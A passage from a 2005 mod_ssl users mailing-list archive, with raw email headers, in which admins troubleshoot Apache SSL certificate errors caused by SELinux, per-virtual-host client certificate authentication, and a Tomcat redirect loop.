> > server certificates, but I'm still facing the same
> > issue.
> >
> > Has anybody experienced such an error ? Any help
> is
> > appreciated.
> >
> > Thanks in advance,
> > -Alaka
> >
> > __________________________________________________
> > Do You Yahoo!?
> > Tired of spam?  Yahoo! Mail has the best spam
> protection around
> > http://mail.yahoo.com
> >
>
______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)             
>      www.modssl.org
> > User Support Mailing List                     
> modssl-users@modssl.org
> > Automated List Manager                           
> majordomo@modssl.org
> >
> 
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 



		
__________________________________ 
Do you Yahoo!? 
Yahoo! Small Business - Try our new Resources site
http://smallbusiness.yahoo.com/resources/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 31 14:10:50 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2E4E114D9B2; Tue, 31 May 2005 14:10:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web307.biz.mail.mud.yahoo.com (web307.biz.mail.mud.yahoo.com [68.142.199.183])
	by master.modssl.org (Postfix) with SMTP id 3BAC214D9AD
	for ; Tue, 31 May 2005 14:10:46 +0200 (CEST)
Message-ID: <20050531121028.52364.qmail@web307.biz.mail.mud.yahoo.com>
Received: from [59.93.162.24] by web307.biz.mail.mud.yahoo.com via HTTP; Tue, 31 May 2005 05:10:27 PDT
Date: Tue, 31 May 2005 05:10:27 -0700 (PDT)
From: Bibhash Roy 
Subject: SSLCertificateFile: file server.crt does not exist or empty
To: modssl-users@modssl.org
In-Reply-To: 6667
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bibhash Roy 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am hosting Apache Web Server on Red Hat Enterprise (RHEL4).
The apache rpm is httpd-2.0.52-9.ent

Now when I have default-site SSL-Enabled(default virtual host), I get the following error
on restart:
1.
[root@rhel4localbox ~]# /etc/init.d/httpd restart
Stopping httpd: [FAILED]
[Wed May 25 14:39:17 2005] [warn] _default_ VirtualHost overlap on port 443, the first
has

precedence
(98)Address already in use: make_sock: could not bind to address [::]:443
no listening sockets available, shutting down
Unable to open logs
[FAILED]

2.
When I add a ssl-enabled virtual-host, I get the following error on restart:

[root@rhel4localbox ~]# /etc/init.d/httpd restart
Stopping httpd: [FAILED]
Starting httpd: [Wed May 25 14:41:23 2005] [warn] module ssl_module is already loaded,
skipping
[Wed May 25 14:41:24 2005] [warn] module ssl_module is already loaded, skipping
Warning: DocumentRoot [/home/vh/sslsite1] does not exist
Syntax error on line 232 of /etc/httpd/conf/httpd.conf:
SSLCertificateFile: file '/home/vh/sslsite1/server.crt' does not exist or is empty
[FAILED]

Any idea on the above problem will be most welcome...

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 31 17:58:02 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0E67A14D9B2; Tue, 31 May 2005 17:58:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 956A814D991
	for ; Tue, 31 May 2005 17:58:01 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11/8.12.11) with ESMTP id j4VFvx4Q010417;
	Tue, 31 May 2005 11:57:59 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id j4VFvwO13530;
	Tue, 31 May 2005 11:57:58 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.13.1/8.12.7) with ESMTP id j4VFvvtd014927;
	Tue, 31 May 2005 16:57:57 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.13.1/8.12.10/Submit) id j4VFvv7u014926;
	Tue, 31 May 2005 16:57:57 +0100
Date: Tue, 31 May 2005 16:57:57 +0100
From: Joe Orton 
To: Bibhash Roy 
Cc: modssl-users@modssl.org
Subject: Re: SSLCertificateFile: file server.crt does not exist or empty
Message-ID: <20050531155757.GA14480@redhat.com>
Mail-Followup-To: Bibhash Roy ,
	modssl-users@modssl.org
References: <20050531121028.52364.qmail@web307.biz.mail.mud.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <20050531121028.52364.qmail@web307.biz.mail.mud.yahoo.com>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, May 31, 2005 at 05:10:27AM -0700, Bibhash Roy wrote:
> I am hosting Apache Web Server on Red Hat Enterprise (RHEL4).
> The apache rpm is httpd-2.0.52-9.ent
...
> 2.
> When I add a ssl-enabled virtual-host, I get the following error on restart:
> 
> [root@rhel4localbox ~]# /etc/init.d/httpd restart
> Stopping httpd: [FAILED]
> Starting httpd: [Wed May 25 14:41:23 2005] [warn] module ssl_module is already loaded,
> skipping
> [Wed May 25 14:41:24 2005] [warn] module ssl_module is already loaded, skipping
> Warning: DocumentRoot [/home/vh/sslsite1] does not exist
> Syntax error on line 232 of /etc/httpd/conf/httpd.conf:
> SSLCertificateFile: file '/home/vh/sslsite1/server.crt' does not exist or is empty
> [FAILED]

You can get this type of error if you have SELinux enabled - check 
/var/log/message to see if there is an "avc" denial message for this 
file.

You'll need to label the certificates correctly if you want to keep 
SELinux enabled, e.g.

 # chcon user_u:object_r:httpd_config_t /home/vh/sslsite1/server.crt

See:

http://fedora.redhat.com/docs/selinux-faq-fc3/
http://fedora.redhat.com/docs/selinux-apache-fc3/

for more details about SELinux and Apache.

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 31 18:05:36 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 14E5014D9B4; Tue, 31 May 2005 18:05:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mclean-vscan4.bah.com (mclean-vscan4.bah.com [156.80.3.64])
	by master.modssl.org (Postfix) with ESMTP id 3E7C014D9AD
	for ; Tue, 31 May 2005 18:05:29 +0200 (CEST)
Received: from mclean-vscan4.bah.com (mclean-vscan4.bah.com [156.80.3.64])
	by mclean-vscan4.bah.com (8.11.0/8.11.0) with SMTP id j4VG5PU05884
	for ; Tue, 31 May 2005 12:05:26 -0400 (EDT)
Received: from mclnexbh01.resource.ds.bah.com ([156.80.7.151])
 by mclean-vscan4.bah.com (SAVSMTP 3.1.6.45) with SMTP id M2005053112052531886
 for ; Tue, 31 May 2005 12:05:25 -0400
Received: from MCLNEXVS07.resource.ds.bah.com ([156.80.7.142]) by mclnexbh01.resource.ds.bah.com with Microsoft SMTPSVC(6.0.3790.211);
	 Tue, 31 May 2005 12:05:26 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: SSL Client Auth with Virtual Hosts
Date: Tue, 31 May 2005 12:05:25 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL Client Auth with Virtual Hosts
Thread-Index: AcVl+ZBGs7khqUeSQQaAYthZzaokWAAACd5g
From: "Hoda Nadeem" 
To: 
X-OriginalArrivalTime: 31 May 2005 16:05:26.0016 (UTC) FILETIME=[8EB19800:01C565FA]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hoda Nadeem" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

=20

Does anybody know if it is possible to use virtual hosts with one
virtual host with ssl client authentication, but the other one without?

Example:=20

NameVirtualHost 111.111.111.111:443


    ServerAdmin adsfasfsa@asdfasfds.com
    DocumentRoot /var/www
    ServerName abc1-no-client-auth.com

    SSLEngine on
    SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key



NameVirtualHost 111.111.111.111:443


    ServerAdmin adsfasfsa@asdfasfds.com
    DocumentRoot /var/www
    ServerName abc1-ssl-client-auth.com

    SSLEngine on
    SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
    SSLVerifyClient require
    SSLVerifyDepth 2
    SSLCACertificateFile /etc/httpd/conf/ssl.crt/server-calist.crt
    SSLOptions +StdEnvVars +ExportCertData
    SSLSessionCache none

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  1 08:27:58 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7B1CB14D9C7; Wed,  1 Jun 2005 08:27:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web311.biz.mail.mud.yahoo.com (web311.biz.mail.mud.yahoo.com [68.142.199.187])
	by master.modssl.org (Postfix) with SMTP id D040714D9B2
	for ; Wed,  1 Jun 2005 08:27:56 +0200 (CEST)
Message-ID: <20050601062756.76665.qmail@web311.biz.mail.mud.yahoo.com>
Received: from [59.93.160.60] by web311.biz.mail.mud.yahoo.com via HTTP; Tue, 31 May 2005 23:27:55 PDT
Date: Tue, 31 May 2005 23:27:55 -0700 (PDT)
From: Bibhash Roy 
Subject: Re: SSLCertificateFile: file server.crt does not exist or empty
To: modssl-users@modssl.org
In-Reply-To: 6667
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bibhash Roy 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--- Joe Orton  wrote:
> On Tue, May 31, 2005 at 05:10:27AM -0700, Bibhash Roy wrote:
> > I am hosting Apache Web Server on Red Hat Enterprise (RHEL4).
> > The apache rpm is httpd-2.0.52-9.ent
> ...
> > 2.
> > When I add a ssl-enabled virtual-host, I get the following error on restart:
> > 
> > [root@rhel4localbox ~]# /etc/init.d/httpd restart
> > Stopping httpd: [FAILED]
> > Starting httpd: [Wed May 25 14:41:23 2005] [warn] module ssl_module is already
> loaded,
> > skipping
> > [Wed May 25 14:41:24 2005] [warn] module ssl_module is already loaded, skipping
> > Warning: DocumentRoot [/home/vh/sslsite1] does not exist
> > Syntax error on line 232 of /etc/httpd/conf/httpd.conf:
> > SSLCertificateFile: file '/home/vh/sslsite1/server.crt' does not exist or is empty
> > [FAILED]
> 
> You can get this type of error if you have SELinux enabled - check 
> /var/log/message to see if there is an "avc" denial message for this 
> file.
> 
> You'll need to label the certificates correctly if you want to keep 
> SELinux enabled, e.g.
> 
>  # chcon user_u:object_r:httpd_config_t /home/vh/sslsite1/server.crt
> 
> See:
> 
> http://fedora.redhat.com/docs/selinux-faq-fc3/
> http://fedora.redhat.com/docs/selinux-apache-fc3/
> 
> for more details about SELinux and Apache.



Thanks joe ...for your tips...
At least I could understand that it was a SELinux issue.

Actually to get things working I had to disable SELinux...

However "chcon user_u:object_r:httpd_config_t /home/vh/sslsite1/server.crt" did not work
out with SELinux enabled....


Regards,

Bibhash Roy


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  1 17:37:30 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8803814D9B4; Wed,  1 Jun 2005 17:37:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gpi.com (gpimail.gpi.com [66.192.59.17])
	by master.modssl.org (Postfix) with ESMTP id D389914D98D
	for ; Wed,  1 Jun 2005 17:37:28 +0200 (CEST)
Received: from ([10.11.20.15])
	by iron01.gpi.com with ESMTP  id KP-AXPMT.1369748;
	Wed, 01 Jun 2005 11:37:12 -0400
Message-ID: <429DD638.1090807@gpi.com>
Date: Wed, 01 Jun 2005 11:37:28 -0400
From: Rob Waldrum 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) 
	Gecko/20040804 Netscape/7.2 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: (no subject)
Content-Type: text/plain;
	charset=us-ascii;
	format=flowed
Content-Transfer-Encoding: 7bit
X-imss-version: 2.025
X-imss-result: Passed
X-imss-approveListMatch: *@gpi.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rob Waldrum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I'm getting the error:

Redirection limit for this URL exceeded. Unable to load the requested 
page. This may be caused by cookies that are blocked.

I have configured Tomcat for SSL on port 8443. I can bring tomcat up at 
https://www.mydomain.com:8443 just fine. But when I add the apps 
portion, such as: https://www.mydomain.com:8443/apps, I get the above 
error. However, when I just use the IP address, such as: 
https://12.34.56.78:8443/apps it works just fine. I have poured over 
tomcat documentatiom, reviewed my setup and configuration, checked the 
logs, everything. I'm stumped. Any ideas?

Rob

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  2 14:51:09 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1659914D9CB; Thu,  2 Jun 2005 14:51:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from warthog.se (mail.warthog.se [212.247.84.253])
	by master.modssl.org (Postfix) with ESMTP id 9B22914D9C8
	for ; Thu,  2 Jun 2005 14:51:07 +0200 (CEST)
Received: from p416002 [192.168.1.20]
	by warthog.se [127.0.0.1]
	with SMTP (MDaemon.PRO.v4.0.5.R)
	for ; Thu, 02 Jun 2005 14:50:03 +0200
Message-ID: <001401c56771$9aee48c0$1401a8c0@p416002>
From: "Daniel Kimblad" 
To: 
References: 
Subject: Re: SSL Client Auth with Virtual Hosts
Date: Thu, 2 Jun 2005 14:50:07 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
X-MDRemoteIP: 192.168.1.20
X-Return-Path: daniel.kimblad@gizmondostudios.se
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Daniel Kimblad" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yes, I've had an environment like that running.

/Daniel

----- Original Message ----- 
From: "Hoda Nadeem" 
To: 
Sent: Tuesday, May 31, 2005 6:05 PM
Subject: SSL Client Auth with Virtual Hosts




Does anybody know if it is possible to use virtual hosts with one
virtual host with ssl client authentication, but the other one without?

Example: 

NameVirtualHost 111.111.111.111:443


    ServerAdmin adsfasfsa@asdfasfds.com
    DocumentRoot /var/www
    ServerName abc1-no-client-auth.com

    SSLEngine on
    SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key



NameVirtualHost 111.111.111.111:443


    ServerAdmin adsfasfsa@asdfasfds.com
    DocumentRoot /var/www
    ServerName abc1-ssl-client-auth.com

    SSLEngine on
    SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
    SSLVerifyClient require
    SSLVerifyDepth 2
    SSLCACertificateFile /etc/httpd/conf/ssl.crt/server-calist.crt
    SSLOptions +StdEnvVars +ExportCertData
    SSLSessionCache none

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  2 15:27:07 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F04B914D9C3; Thu,  2 Jun 2005 15:27:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mclean-vscan3.bah.com (mclean-vscan3.bah.com [156.80.3.63])
	by master.modssl.org (Postfix) with ESMTP id 7DF7E14D9AE
	for ; Thu,  2 Jun 2005 15:27:03 +0200 (CEST)
Received: from mclean-vscan3.bah.com (mclean-vscan3.bah.com [156.80.3.63])
	by mclean-vscan3.bah.com (8.11.0/8.11.0) with SMTP id j52DQvn07275
	for ; Thu, 2 Jun 2005 09:26:57 -0400 (EDT)
Received: from mclnexbh01.resource.ds.bah.com ([156.80.7.151])
 by mclean-vscan3.bah.com (SAVSMTP 3.1.6.45) with SMTP id M2005060209265627050
 for ; Thu, 02 Jun 2005 09:26:56 -0400
Received: from MCLNEXVS07.resource.ds.bah.com ([156.80.7.142]) by mclnexbh01.resource.ds.bah.com with Microsoft SMTPSVC(6.0.3790.211);
	 Thu, 2 Jun 2005 09:26:58 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: SSL Client Auth with Virtual Hosts
Date: Thu, 2 Jun 2005 09:26:57 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL Client Auth with Virtual Hosts
Thread-Index: AcVncclPtpKVeLd4Stiw/kbgg2QUuQAA/elw
From: "Hoda Nadeem" 
To: 
X-OriginalArrivalTime: 02 Jun 2005 13:26:58.0066 (UTC) FILETIME=[C0570F20:01C56776]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hoda Nadeem" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Are there any parameters that I am missing, or am I doing something
incorrect?

On my setup, client authentication is either on or off globally. I can't
seem to isolate it at the virtual host level.

Thanks.=20

Nadeem

Example again:

NameVirtualHost 111.111.111.111:443


    ServerAdmin adsfasfsa@asdfasfds.com
    DocumentRoot /var/www
    ServerName abc1-no-client-auth.com

    SSLEngine on
    SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key



    ServerAdmin adsfasfsa@asdfasfds.com
    DocumentRoot /var/www
    ServerName abc1-ssl-client-auth.com

    SSLEngine on
    SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
    SSLVerifyClient require
    SSLVerifyDepth 2
    SSLCACertificateFile /etc/httpd/conf/ssl.crt/server-calist.crt
    SSLOptions +StdEnvVars +ExportCertData




-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Daniel Kimblad
Sent: Thursday, June 02, 2005 8:50 AM
To: modssl-users@modssl.org
Subject: Re: SSL Client Auth with Virtual Hosts

Yes, I've had an environment like that running.

/Daniel

----- Original Message -----
From: "Hoda Nadeem" 
To: 
Sent: Tuesday, May 31, 2005 6:05 PM
Subject: SSL Client Auth with Virtual Hosts




Does anybody know if it is possible to use virtual hosts with one
virtual host with ssl client authentication, but the other one without?

Example:=20

NameVirtualHost 111.111.111.111:443


    ServerAdmin adsfasfsa@asdfasfds.com
    DocumentRoot /var/www
    ServerName abc1-no-client-auth.com

    SSLEngine on
    SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key



NameVirtualHost 111.111.111.111:443


    ServerAdmin adsfasfsa@asdfasfds.com
    DocumentRoot /var/www
    ServerName abc1-ssl-client-auth.com

    SSLEngine on
    SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
    SSLVerifyClient require
    SSLVerifyDepth 2
    SSLCACertificateFile /etc/httpd/conf/ssl.crt/server-calist.crt
    SSLOptions +StdEnvVars +ExportCertData
    SSLSessionCache none

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  2 15:36:45 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8CA7714D9C3; Thu,  2 Jun 2005 15:36:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gpi.com (gpimail.gpi.com [66.192.59.17])
	by master.modssl.org (Postfix) with ESMTP id EE4E214D9AE
	for ; Thu,  2 Jun 2005 15:36:44 +0200 (CEST)
Received: from ([10.11.20.15])
	by iron01.gpi.com with ESMTP  id KP-AXPMT.1459904;
	Thu, 02 Jun 2005 09:36:17 -0400
Message-ID: <429F0B61.7050605@gpi.com>
Date: Thu, 02 Jun 2005 09:36:33 -0400
From: Rob Waldrum 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) 
	Gecko/20040804 Netscape/7.2 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Redirection limit for this URL exceeded.
Content-Type: multipart/alternative;
	boundary=------------050704030609090608040703
X-imss-version: 2.025
X-imss-result: Passed
X-imss-approveListMatch: *@gpi.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rob Waldrum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------050704030609090608040703
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi,

I'm still getting this error:

Redirection limit for this URL exceeded. Unable to load the requested 
page. This may be caused by cookies that are blocked.

I have configured Tomcat for SSL on port 8443. I can bring tomcat up at 
https://www.mydomain.com:8443 just fine. But when I add the apps 
portion, such as: https://www.mydomain.com:8443/apps, I get the above 
error. However, when I just use the IP address, such as: 
https://12.34.56.78:8443/apps it works just fine. I have poured over 
tomcat documentatiom, reviewed my setup and configuration, checked the 
logs, everything. I'm stumped. Any ideas?

Rob


--------------050704030609090608040703
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  
  


Hi,




I'm still getting this error:




Redirection limit for this URL exceeded. Unable to load the
requested page. This may be caused by cookies that are blocked.




I have configured Tomcat for SSL on port 8443. I can bring tomcat up at
https://www.mydomain.com:8443
just fine. But when I add the apps portion, such as: https://www.mydomain.com:8443/apps,
I get the above error. However, when I just use the IP address, such
as: https://12.34.56.78:8443/apps
it works just fine. I have poured over tomcat documentatiom, reviewed
my setup and configuration, checked the logs, everything. I'm stumped.
Any ideas?




Rob






--------------050704030609090608040703--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  2 15:43:12 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AD43014D9C6; Thu,  2 Jun 2005 15:43:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from jason.comodo.net (firewall2.comodogroup.com [195.92.253.138])
	by master.modssl.org (Postfix) with ESMTP id 7212414D9B4
	for ; Thu,  2 Jun 2005 15:43:11 +0200 (CEST)
Received: (qmail 7278 invoked by uid 1114); 2 Jun 2005 14:43:11 +0100
Received: from robbie.comodo.net (HELO robbie.comodo.net) (192.168.30.202)
  by jason.comodo.net (qpsmtpd/0.28) with ESMTP; Thu, 02 Jun 2005 14:43:11 +0100
Received: (qmail 29160 invoked by uid 1114); 2 Jun 2005 14:43:10 +0100
Received: from viper2.comodo.net (HELO viper2.comodogroup.com) (192.168.30.50)
  by robbie.comodo.net (qpsmtpd/0.28) with ESMTP; Thu, 02 Jun 2005 14:43:10 +0100
Message-Id: <6.2.1.2.2.20050602144115.0465f7b8@192.168.30.202>
X-Mailer: QUALCOMM Windows Eudora Version 6.2.1.2
Date: Thu, 02 Jun 2005 14:43:08 +0100
To: modssl-users@modssl.org
From: Tim Fowle 
Subject: Re: Redirection limit for this URL exceeded.
In-Reply-To: <429F0B61.7050605@gpi.com>
References: <429F0B61.7050605@gpi.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Comodo-ClamAV-Virus-Check-By: robbie.comodo.net - PASSED!
X-Comodo-ClamAV-Virus-Version: ClamAV 0.83/906/Wed Jun  1 22:38:56 2005
X-Comodo-F-Prot-Virus-Check-By: robbie.comodo.net - PASSED!
X-Comodo-F-Prot-Virus-Program: F-PROT ANTIVIRUS Program version: 4.5.4 Engine version: 3.16.6 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tim Fowle 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Rob,

I may be wrong but i would work through your mod_rewrite configuration as 
afaik this error is caused by internal redirections going in a loop, rather 
than it being an ssl related error.

you can turn on rewrite logging and see exactly what it is doing, although 
beware this does produce LOTS of logging, especially with a rewrite loop.


Tim


At 14:36 02/06/2005, you wrote:
>Hi,
>
>I'm still getting this error:
>
>Redirection limit for this URL exceeded. Unable to load the requested 
>page. This may be caused by cookies that are blocked.
>
>I have configured Tomcat for SSL on port 8443. I can bring tomcat up at 
>https://www.mydomain.com:8443 just fine. 
>But when I add the apps portion, such as: 
>https://www.mydomain.com:8443/apps, I 
>get the above error. However, when I just use the IP address, such as: 
>https://12.34.56.78:8443/apps it works just 
>fine. I have poured over tomcat documentatiom, reviewed my setup and 
>configuration, checked the logs, everything. I'm stumped. Any ideas?
>
>Rob

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  2 16:22:26 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 15F5714D9C6; Thu,  2 Jun 2005 16:22:26 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from warthog.se (mail.warthog.se [212.247.84.253])
	by master.modssl.org (Postfix) with ESMTP id CCA2714D9B4
	for ; Thu,  2 Jun 2005 16:22:25 +0200 (CEST)
Received: from p416002 [192.168.1.20]
	by warthog.se [127.0.0.1]
	with SMTP (MDaemon.PRO.v4.0.5.R)
	for ; Thu, 02 Jun 2005 16:21:56 +0200
Message-ID: <000401c5677e$722eb110$1401a8c0@p416002>
From: "Daniel Kimblad" 
To: 
References: 
Subject: Re: SSL Client Auth with Virtual Hosts
Date: Thu, 2 Jun 2005 16:22:02 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
